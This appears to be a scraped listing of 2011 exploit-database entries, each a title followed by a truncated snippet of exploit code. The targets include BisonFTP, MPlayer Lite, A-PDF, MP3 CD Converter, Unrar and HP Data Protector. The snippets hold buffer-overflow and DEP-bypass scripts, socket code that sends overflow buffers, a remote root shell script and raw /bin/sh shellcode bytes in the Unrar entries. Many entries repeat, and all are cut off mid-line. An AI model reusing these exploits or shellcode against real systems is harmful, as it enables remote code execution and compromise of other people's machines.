EChat-Server-v2.5
EChat Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts...
MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass
MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass !/usr/bin/python +Exploit Title: MP3 CD Converter Professional Universal DEP Bypass Exploit +Date: 11\08\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe +Version: 5.3.0 +Tested On: WIN-XP SP3...
MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass
!/usr/bin/python +Exploit Title: MP3 CD Converter Professional Universal DEP Bypass Exploit +Date: 11\08\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe +Version: 5.3.0 +Tested On: WIN-XP SP3 Brazilian Portuguese +CVE: N/A from struct import pack from...
BisonFTP Server <=v3.5 Remote Buffer Overflow Exploit
Exploit for windows platform in category remote exploits !/usr/bin/python BisonFTP Server \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to host sock = socketAFINET,SOCKSTREAM sock.connectsys.argv1,intsys.argv2 sock.recv1024 time.sleep5 padding buffer = "\x90" 1092 36...
A-PDF All to MP3 v2.3.0 Universal DEP Bypass Exploit
Exploit for windows platform in category local exploits !/usr/bin/ruby +Exploit Title: A-PDF All to MP3 v2.3.0 Universal DEP Bypass Exploit +Date: 09\08\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.a-pdf.com/all-to-mp3/ +Version: 2.3.0 +Tested On: WIN-XP SP3 Brazilian Portuguese +CVE: N/...
HP Data Protector (Linux) - Remote Command Execution
HP Data Protector Linux - Remote Command Execution !/bin/bash Exploit Title: HP Data Protector Remote Root Shell for Linux Date: 2011-08-10 Author: SZ Software Link: http://www8.hp.com/us/en/software/software-product.html?compURI=tcm:245-936920&pageTitle=data-protector Version: 0.9 Tested on:...
HP Data Protector (Linux) - Remote Command Execution
!/bin/bash Exploit Title: HP Data Protector Remote Root Shell for Linux Date: 2011-08-10 Author: SZ Software Link: http://www8.hp.com/us/en/software/software-product.html?compURI=tcm:245-936920&pageTitle=data-protector Version: 0.9 Tested on: HP-UX, Linux CVE: CVE-2011-0923 Notes: ZDI-11-055...
A-PDF All to MP3 2.3.0 - Universal DEP Bypass
!/usr/bin/ruby +Exploit Title: A-PDF All to MP3 v2.3.0 Universal DEP Bypass Exploit +Date: 09\08\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.a-pdf.com/all-to-mp3/ +Version: 2.3.0 +Tested On: WIN-XP SP3 Brazilian Portuguese +CVE: N/A Dep bypass method: LoadLibraryA"kernel32.dll" +...
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow
!/usr/bin/python BisonFTP Server \n" %sys.argv0 sys.exit print "\n! Connecting to %s ..." %sys.argv1 connect to host sock = socketAFINET,SOCKSTREAM sock.connectsys.argv1,intsys.argv2 sock.recv1024 time.sleep5 padding buffer = "\x90" 1092 368 bytes shellcode buffer +=...
Free-Float-FTP-REST
Free Float FTP Server ACCL Command Remote Buffer Overflow Exploit ToDo: Add remote shell ToDo: Test vulnerable targets import errno from os import strerror from socket import import sys from time import sleep from struct import pack if lensys.argv != 3: print "-Usage: python %s " % sys.argv0 prin...
HP Data Protector Remote Shell
!/bin/bash Exploit Title: HP Data Protector Remote Shell for HPUX Date: 2011-08-02 Author: Adrian Puente Z. Software Link: http://www8.hp.com/us/en/software/software-product.html?compURI=tcm:245-936920&pageTitle=data-protector Version: 0.9 Tested on: HPUX CVE: CVE-2011-0923 Notes: ZDI-11-055...
Unrar 3.9.3 - Local Stack Overflow
Unrar 3.9.3 - Local Stack Overflow !/usr/bin/perl =head1 TITLE Winrar http://www.shell-storm.org/shellcode/files/shellcode-752.php use constant SHELLCODE = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" . "\x73\x68\x68\x2f\x62\x69\x6e\x89" . "\xe3\xb0\x0b\xcd\x80"; use constant BUFF = '-' . '3lrvs' x 820;...
Unrar 3.9.3 Stack Overflow
!/usr/bin/perl =head1 TITLE Winrar http://www.shell-storm.org/shellcode/files/shellcode-752.php use constant SHELLCODE = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" . "\x73\x68\x68\x2f\x62\x69\x6e\x89" . "\xe3\xb0\x0b\xcd\x80"; use constant BUFF = '-' . '3lrvs' x 820; $pname = "/usr/bin/unrar"; die "-File...
Unrar 3.9.3 Local Stack Overflow Exploit
Exploit for linux platform in category local exploits !/usr/bin/perl =head1 TITLE Winrar http://www.shell-storm.org/shellcode/files/shellcode-752.php use constant SHELLCODE = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" . "\x73\x68\x68\x2f\x62\x69\x6e\x89" . "\xe3\xb0\x0b\xcd\x80"; use constant BUFF = '-'...
Filter Proxy HTTP Headers Mismatch
Filter web Proxy is a proxy tool that interferes between a web server and a client browser. It enables users to change the HTTP headers and client side content, e.g. HTML and JavaScript. The filter proxy can also block pop-ups and malicious content. Malicious users can use this technique to chang...
MPlayer Lite 33064 Buffer Overflow
!/usr/bin/perl +Exploit Title: MPlayer Lite r33064 m3u Buffer Overflow ExploitDEP BYPASS +Date: 24\07\2011 +Author: C4SS!0 and h1ch4m +Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayerRelease/Revision%2033064/mplayerliter33064.7z/download +Version: Lite 33064 +Tested On:...
MPlayer Lite r33064 m3u Buffer Overflow Exploit (DEP Bypass)
No description provided by source. !/usr/bin/perl +Exploit Title: MPlayer Lite r33064 m3u Buffer Overflow ExploitDEP BYPASS +Date: 24\07\2011 +Author: C4SS!0 and h1ch4m +Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayerRelease/Revision%2033064/mplayerliter33064.7z/download...
OSX - Universal ROP shellcode
OSX - Universal ROP shellcode. Shellcode exploit for osx platform ; universal OSX dyld ROP shellcode ; tested on OS X 10.6.8 ; ; if you don't want to compile, copy stage0 code from precompiled.txt ; and append your normal shellcode to it. ; ; usage: ; - put your 'normal' shellcode in...
MPlayer Lite r33064 m3u Buffer Overflow Exploit (DEP Bypass)
Exploit for windows platform in category local exploits !/usr/bin/perl +Exploit Title: MPlayer Lite r33064 m3u Buffer Overflow ExploitDEP BYPASS +Date: 24\07\2011 +Author: C4SS!0 and h1ch4m +Software Link:...
MPlayer Lite r33064 - .m3u Local Buffer Overflow (DEP Bypass)
MPlayer Lite r33064 - .m3u Local Buffer Overflow DEP Bypass !/usr/bin/perl +Exploit Title: MPlayer Lite r33064 m3u Buffer Overflow ExploitDEP BYPASS +Date: 24\07\2011 +Author: C4SS!0 and h1ch4m +Software Link:...